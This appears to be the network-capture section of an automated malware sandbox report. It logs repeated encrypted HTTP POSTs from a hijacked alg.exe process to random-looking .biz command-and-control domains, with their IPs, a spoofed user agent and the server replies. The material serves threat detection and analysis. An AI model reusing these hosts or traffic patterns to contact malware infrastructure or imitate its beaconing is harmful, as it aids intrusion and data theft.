                                                                                                                                                                                                                                                                                                                                                                                                                  Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                  Host: lpuegx.biz
                                                                                                                                                                                                                                                                                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                                                                                                                                  Content-Length: 778
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:50:16.353420019 CET778OUTData Raw: 9d 30 e5 ab 1a 3a 81 ea fe 02 00 00 22 95 92 75 29 20 d0 50 28 a8 3c 5c 75 86 18 1d 87 04 66 2d cf 81 cc cb 5b 90 a0 c8 cb ae 0f 9c 5f 4a 95 96 67 92 47 3d 29 d7 00 f1 b1 11 c1 54 64 d8 0b 0d ee ed 9e 80 2f 4d a2 b8 f8 73 54 88 3d 09 d2 65 7a 01
                                                                                                                                                                                                                                                                                                                                                                                                                  Data Ascii: 0:"u) P(<\uf-[_JgG=)Td/MsT=ezF^`kYYL.2+!oXuh%1rdn!}%\' dUOox0-#Y'`L-(KcC(mv!IT,"%GWt


                                                                                                                                                                                                                                                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                                                                  13192.168.2.54983082.112.184.197802636C:\Windows\System32\alg.exe
                                                                                                                                                                                                                                                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:50:24.924645901 CET361OUTPOST /tkrvouqomflftlqp HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                                                  Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                                                                  Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                  Host: vjaxhpbji.biz
                                                                                                                                                                                                                                                                                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                                                                                                                                  Content-Length: 778
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:50:24.924668074 CET778OUTData Raw: d8 fc 79 b6 8f 46 8f db fe 02 00 00 6f 9f b6 50 4f 40 83 b0 fc b3 a3 6f 80 9b 38 1e 72 79 3c cc e2 de 83 a0 d7 ad dd 1e 19 bc 30 ad a8 44 03 b4 d4 65 51 69 ff 1b ce 62 e1 45 61 31 45 9a c4 72 04 93 5b 1e 72 79 9b c8 f1 e4 56 58 a3 63 09 9d 3f b1
                                                                                                                                                                                                                                                                                                                                                                                                                  Data Ascii: yFoPO@o8ry<0DeQibEa1Er[ryVXc?fHmU LjAmQyp6_t0-JYr@\GR.!9M8#R^d:]%t%Hs/q'f{&l;,@]$?/_sY9.n


                                                                                                                                                                                                                                                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                                                                  14192.168.2.54987382.112.184.197802636C:\Windows\System32\alg.exe
                                                                                                                                                                                                                                                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:50:33.465249062 CET352OUTPOST /bdrtsxy HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                                                  Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                                                                  Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                  Host: vjaxhpbji.biz
                                                                                                                                                                                                                                                                                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                                                                                                                                  Content-Length: 778
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:50:33.465286970 CET778OUTData Raw: df 01 8b cd 5a e6 15 c1 fe 02 00 00 c2 e7 9b 5f ee e1 6b ff 3e 98 17 5a 2f 47 90 38 ba 74 7e fd ab 9d 1f 32 e5 df 22 90 f4 31 ef 57 22 40 1f b2 34 61 2c 32 78 e5 c2 54 3d e7 f1 d2 24 f5 47 14 9e 9f d2 ef 6c e5 da 2e 2c 87 9d 09 c8 de 05 55 bb c5
                                                                                                                                                                                                                                                                                                                                                                                                                  Data Ascii: Z_k>Z/G8t~2"1W"@4a,2xT=$Gl.,Uh!`vu4*<ys%KH*dFCMd9/p8ajWfADRg.ahxE})u$IJd4N`8^xbvQxPR)nd%fQxrQ6}n


                                                                                                                                                                                                                                                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                                                                  15192.168.2.54991947.129.31.212802636C:\Windows\System32\alg.exe
                                                                                                                                                                                                                                                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:50:42.274624109 CET346OUTPOST /len HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                                                  Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                                                                  Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                  Host: xlfhhhm.biz
                                                                                                                                                                                                                                                                                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                                                                                                                                  Content-Length: 778
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:50:42.274646044 CET778OUTData Raw: 7b 49 91 8e 45 89 34 c0 fe 02 00 00 ec 8d 65 02 ab cc 34 0b 94 75 c6 06 dd c2 91 52 3f 5b 25 4f f3 b5 61 3a e7 ba 6e 26 82 5a a7 84 5e 37 f2 ac 6e fe d6 26 78 f3 5e cf 86 33 35 43 c9 27 11 d4 42 c6 0e fb 42 29 07 8c 1e 7c 5f 04 80 bd b1 9c 0d 4f
                                                                                                                                                                                                                                                                                                                                                                                                                  Data Ascii: {IE4e4uR?[%Oa:n&Z^7n&x^35C'BB)|_O]BtVjo&,.4&!o;k/HLHpeONr+2_vcraMrmI/pz{HAez2\w^9?"?Bf-iKRUTg+}Ae=Micz!
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:50:43.717546940 CET415INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                                                                  Server: nginx
                                                                                                                                                                                                                                                                                                                                                                                                                  Date: Mon, 28 Oct 2024 15:50:43 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                  Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                                                                                  Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                                                                  Connection: close
                                                                                                                                                                                                                                                                                                                                                                                                                  Set-Cookie: btst=7f5735b7ed980352ecdf63e68f3ce356|155.94.241.188|1730130643|1730130643|0|1|0; path=/; domain=.xlfhhhm.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                                                                                                                                                                                                                                  Set-Cookie: snkz=155.94.241.188; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                  Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                                                                  Data Ascii: 0


                                                                                                                                                                                                                                                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                                                                  16192.168.2.54993013.251.16.150802636C:\Windows\System32\alg.exe
                                                                                                                                                                                                                                                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:50:44.138880014 CET358OUTPOST /ubaevhdsrbjcmaql HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                                                  Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                                                                  Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                  Host: ifsaia.biz
                                                                                                                                                                                                                                                                                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                                                                                                                                  Content-Length: 778
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:50:44.138880014 CET778OUTData Raw: fe 36 68 32 e2 1c 3a 6a fe 02 00 00 12 b6 ee 11 a2 a9 5c 3c 5b 35 70 5e 88 9a 2c 4a 54 92 eb c0 4c 25 7a 55 dc a2 dc 9b 3b 58 41 53 ac 69 a9 20 20 4a 8a 0b 79 94 05 88 7a eb 1c 4b 7e 4d ed be fc 53 17 f7 20 98 69 e8 5c e5 d3 08 96 e8 77 c7 a8 d1
                                                                                                                                                                                                                                                                                                                                                                                                                  Data Ascii: 6h2:j\<[5p^,JTL%zU;XASi JyzK~MS i\w6Xw"N}fTQE89?$EX;J|4 m"813\. pb_5wb?;g/_$!L# g\{nV$<W|*:U/
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:50:45.564770937 CET414INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                                                                  Server: nginx
                                                                                                                                                                                                                                                                                                                                                                                                                  Date: Mon, 28 Oct 2024 15:50:45 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                  Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                                                                                  Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                                                                  Connection: close
                                                                                                                                                                                                                                                                                                                                                                                                                  Set-Cookie: btst=178d9167f2d65bee40964bd354bca56b|155.94.241.188|1730130645|1730130645|0|1|0; path=/; domain=.ifsaia.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                                                                                                                                                                                                                                  Set-Cookie: snkz=155.94.241.188; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                  Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                                                                  Data Ascii: 0


                                                                                                                                                                                                                                                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                                                                  17192.168.2.54994144.221.84.105802636C:\Windows\System32\alg.exe
                                                                                                                                                                                                                                                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:50:45.907524109 CET348OUTPOST /yeb HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                                                  Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                                                                  Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                  Host: saytjshyf.biz
                                                                                                                                                                                                                                                                                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                                                                                                                                  Content-Length: 778
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:50:45.907537937 CET778OUTData Raw: b9 32 ca 6b fe d5 ce d7 fe 02 00 00 d1 28 a2 65 00 4f 06 74 7e 90 07 37 cc f8 45 2a a7 50 a0 82 2b fb da 9a e4 79 2d 44 15 c0 91 55 cf f9 66 40 46 25 e7 3e 83 13 6a ec 4b 79 eb 83 d8 72 d3 db ed 62 ed 5b d9 ca 34 cf db b0 91 86 5a 2d 81 25 d3 9f
                                                                                                                                                                                                                                                                                                                                                                                                                  Data Ascii: 2k(eOt~7E*P+y-DUf@F%>jKyrb[4Z-%:fGfZu%V_gq"[LO2yyau+z<6^4|aL9/nP@X7"G37F9Pa(Y)oDy@2/c[X0
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:50:46.573523045 CET417INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                                                                  Server: nginx
                                                                                                                                                                                                                                                                                                                                                                                                                  Date: Mon, 28 Oct 2024 15:50:46 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                  Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                                                                                  Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                                                                  Connection: close
                                                                                                                                                                                                                                                                                                                                                                                                                  Set-Cookie: btst=628c2ccdd12dab30889d6cb69674e49f|155.94.241.188|1730130646|1730130646|0|1|0; path=/; domain=.saytjshyf.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                                                                                                                                                                                                                                  Set-Cookie: snkz=155.94.241.188; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                  Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                                                                  Data Ascii: 0


                                                                                                                                                                                                                                                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                                                                  18192.168.2.54994718.141.10.107802636C:\Windows\System32\alg.exe
                                                                                                                                                                                                                                                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:50:46.822643995 CET345OUTPOST /kb HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                                                  Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                                                                  Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                  Host: vcddkls.biz
                                                                                                                                                                                                                                                                                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                                                                                                                                  Content-Length: 778
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:50:46.822664022 CET778OUTData Raw: 48 7a 35 fd ea c6 f6 07 fe 02 00 00 ce 74 c7 03 fa 40 52 56 32 5c 73 48 37 8d 3f 63 39 39 0f 7a 2f d1 db a9 d4 08 93 05 0a 67 6b 59 a8 6c 3f e0 e9 40 93 c8 df 7b 38 a4 b2 25 a4 0d 50 1e 32 db 62 5e cf 6d 15 b2 bb a8 44 c3 a6 b1 78 f5 b5 e4 3a b7
                                                                                                                                                                                                                                                                                                                                                                                                                  Data Ascii: Hz5t@RV2\sH7?c99z/gkYl?@{8%P2b^mDx:2j4Ns8pgDBGq"(2^9(OE42X- YQ!T:_xqwfjL Xq==7erXJE_XN]FtX=yqb0>5
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:50:48.250859976 CET415INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                                                                  Server: nginx
                                                                                                                                                                                                                                                                                                                                                                                                                  Date: Mon, 28 Oct 2024 15:50:47 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                  Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                                                                                  Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                                                                  Connection: close
                                                                                                                                                                                                                                                                                                                                                                                                                  Set-Cookie: btst=87ae6604782ae2102966e3ac8490597a|155.94.241.188|1730130647|1730130647|0|1|0; path=/; domain=.vcddkls.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                                                                                                                                                                                                                                  Set-Cookie: snkz=155.94.241.188; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                  Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                                                                  Data Ascii: 0


                                                                                                                                                                                                                                                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                                                                  19192.168.2.549958172.234.222.138802636C:\Windows\System32\alg.exe
                                                                                                                                                                                                                                                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:50:48.585644007 CET346OUTPOST /ofmvo HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                                                  Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                                                                  Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                  Host: fwiwk.biz
                                                                                                                                                                                                                                                                                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                                                                                                                                  Content-Length: 778
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:50:48.585679054 CET778OUTData Raw: cf b0 14 41 5c 13 03 68 fe 02 00 00 05 b5 31 cc 44 1e 1a 7a f1 60 6e 5f 99 19 0d f2 1e fb 87 26 cc 2b e2 16 40 8a 8b d6 51 76 22 5a 56 0e 10 26 e9 4c 0f fd 1f 84 c1 7a f0 d6 58 12 dd 90 ba f4 76 2c 44 dc 33 7e f3 98 b6 18 fd b6 7d 4e 9d 2a f5 22
                                                                                                                                                                                                                                                                                                                                                                                                                  Data Ascii: A\h1Dz`n_&+@Qv"ZV&LzXv,D3~}N*"0w;}p5hr$`sTxO1!>Vb9<a<G%B~1ibyZikX!Tpj^H/^O!TyWlAevWn7z{0x]#


                                                                                                                                                                                                                                                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                                                                  20192.168.2.549960172.234.222.138802636C:\Windows\System32\alg.exe
                                                                                                                                                                                                                                                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:50:49.301923990 CET349OUTPOST /ckdrshko HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                                                  Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                                                                  Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                  Host: fwiwk.biz
                                                                                                                                                                                                                                                                                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                                                                                                                                  Content-Length: 778
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:50:49.302012920 CET778OUTData Raw: f7 9c 7f 54 85 53 77 51 fe 02 00 00 cd 79 53 cf 2d dc 70 88 a0 10 5a 82 2c 8a 96 c4 96 05 6f 68 bf 17 4f ec c9 29 77 34 89 00 a5 c5 61 d0 04 7b 73 8f bf 5f 81 fd f4 05 1d 27 c0 f4 eb 52 2d f9 72 aa 08 61 7c 80 6f cc ba 61 93 fc 51 95 dc 6d 11 7c
                                                                                                                                                                                                                                                                                                                                                                                                                  Data Ascii: TSwQyS-pZ,ohO)w4a{s_'R-ra|oaQm|,r:w7u3fGDt 39bkdQav^V-O]8+C%?rmiVVcn:u&m|0+.#vL^% fsx7@Qhu]qR


                                                                                                                                                                                                                                                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                                                                  21192.168.2.54996634.246.200.160802636C:\Windows\System32\alg.exe
                                                                                                                                                                                                                                                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:50:50.206497908 CET358OUTPOST /qearwetpmwvhvwhi HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                                                  Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                                                                  Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                  Host: tbjrpv.biz
                                                                                                                                                                                                                                                                                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                                                                                                                                  Content-Length: 778
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:50:50.206515074 CET778OUTData Raw: 89 e0 b3 e6 bc 9b c8 12 fe 02 00 00 19 49 12 f2 71 77 9f 88 6b f2 96 ab b2 4c fc 66 53 00 87 32 31 ea 11 d2 56 ed 33 46 88 67 65 d1 af 85 15 cf e6 db 4b 97 86 c4 56 ec 2e 27 16 ec bf dc f5 9b e3 96 9b 24 3b c9 55 02 c5 75 d6 bc dc 80 ca c4 dc 25
                                                                                                                                                                                                                                                                                                                                                                                                                  Data Ascii: IqwkLfS21V3FgeKV.'$;Uu%9j9tz_[Wly/fpzqdM< xeS^4P8#XQ/EzHnhS2hXSyk+97tR:S>tL07>1^aSM
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:50:51.183917046 CET414INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                                                                  Server: nginx
                                                                                                                                                                                                                                                                                                                                                                                                                  Date: Mon, 28 Oct 2024 15:50:51 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                  Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                                                                                  Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                                                                  Connection: close
                                                                                                                                                                                                                                                                                                                                                                                                                  Set-Cookie: btst=a1fad22a774aac24e80974858558745e|155.94.241.188|1730130651|1730130651|0|1|0; path=/; domain=.tbjrpv.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                                                                                                                                                                                                                                  Set-Cookie: snkz=155.94.241.188; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                  Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                                                                  Data Ascii: 0


                                                                                                                                                                                                                                                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                                                                  22192.168.2.54997518.208.156.248802636C:\Windows\System32\alg.exe
                                                                                                                                                                                                                                                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:50:51.454699993 CET342OUTPOST /p HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                                                  Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                                                                  Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                  Host: deoci.biz
                                                                                                                                                                                                                                                                                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                                                                                                                                  Content-Length: 778
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:50:51.454727888 CET778OUTData Raw: 47 8e 96 97 35 ac c4 b1 fe 02 00 00 22 83 8c 3f 1c 41 92 26 c0 22 3a d4 23 2d 56 c1 22 27 d8 f5 f2 67 0a fe 54 7e 38 71 a0 05 66 57 13 49 0a 13 99 d6 be 46 b0 d0 8a 76 6f 3e ad f5 f4 e1 4e db 29 2b 80 6f 79 52 24 0e ea a6 6b 5a f3 08 ab c6 21 8f
                                                                                                                                                                                                                                                                                                                                                                                                                  Data Ascii: G5"?A&":#-V"'gT~8qfWIFvo>N)+oyR$kZ!i;6ravoWv R(5ZxU>KJ5>[ic):(3bmVI--BD~%^OaujTyvw4*iH*KaeX;MxoW^-
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:50:52.157196045 CET413INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                                                                  Server: nginx
                                                                                                                                                                                                                                                                                                                                                                                                                  Date: Mon, 28 Oct 2024 15:50:52 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                  Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                                                                                  Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                                                                  Connection: close
                                                                                                                                                                                                                                                                                                                                                                                                                  Set-Cookie: btst=aabddc3828a39ee7620bea5bf54b9a0b|155.94.241.188|1730130652|1730130652|0|1|0; path=/; domain=.deoci.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                                                                                                                                                                                                                                  Set-Cookie: snkz=155.94.241.188; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                  Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                                                                  Data Ascii: 0


                                                                                                                                                                                                                                                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                                                                  23192.168.2.549982208.100.26.245802636C:\Windows\System32\alg.exe
                                                                                                                                                                                                                                                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:50:52.413630962 CET357OUTPOST /pubppqcmfqvto HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                                                  Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                                                                  Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                  Host: gytujflc.biz
                                                                                                                                                                                                                                                                                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                                                                                                                                  Content-Length: 778
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:50:52.416934967 CET778OUTData Raw: a3 f3 44 fe 7b f5 e1 80 fe 02 00 00 55 55 ed 42 b8 f9 f8 c9 9f 60 dc 9e 7f 8b d5 5e a5 3d cf 2a 02 f3 b9 3d 96 c0 22 8f 04 8c 45 13 f4 ae 5f 07 02 d5 9b 8c 3f 16 96 b3 98 0d b2 9f 42 aa 9d 23 0d 2d e2 62 47 70 92 60 49 31 a0 90 59 35 d8 dd ac 52
                                                                                                                                                                                                                                                                                                                                                                                                                  Data Ascii: D{UUB`^=*="E_?B#-bGp`I1Y5RsDkSx=8T!.5@pzh|j$J*K};\J+ )Iiy\T~L7-nr@#>"F@zQ)iAo*6
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:50:53.053874969 CET744INHTTP/1.1 404 Not Found
                                                                                                                                                                                                                                                                                                                                                                                                                  Server: nginx/1.14.0 (Ubuntu)
                                                                                                                                                                                                                                                                                                                                                                                                                  Date: Mon, 28 Oct 2024 15:50:52 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                  Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                                                                                  Content-Length: 580
                                                                                                                                                                                                                                                                                                                                                                                                                  Connection: keep-alive
